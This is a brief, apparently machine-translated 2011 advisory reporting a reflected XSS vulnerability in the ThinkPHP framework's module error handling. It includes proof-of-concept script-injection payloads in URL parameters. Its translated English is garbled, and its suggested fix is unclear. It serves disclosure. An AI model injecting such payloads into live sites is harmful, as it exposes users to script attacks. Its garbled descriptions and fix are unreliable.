ThinkPHP development framework xss-vulnerability warning-the black bar safety net

ID MYHACK58:62201132721
Type myhack58
Reporter 佚名
Modified 2011-12-26T00:00:00


Brief description: open source php development framework for default therexssvulnerabilities, leading to all use of the framework for the development of the system are presentxssvulnerability

Detailed description: does not does not exist in the module handle the error properly, leading toxssvulnerability

Vulnerability to prove:

To Super Rangers test'"><script>alert(3);</script><"&a=login'"><script>alert(0 2 1 4 5 5 9);</script><"&a=help&'"><script>alert(0 2 1 4 5 5 9);</script><"&a=help&

Go and see

Solution: set a is better than filter it~~~

Author Hxai11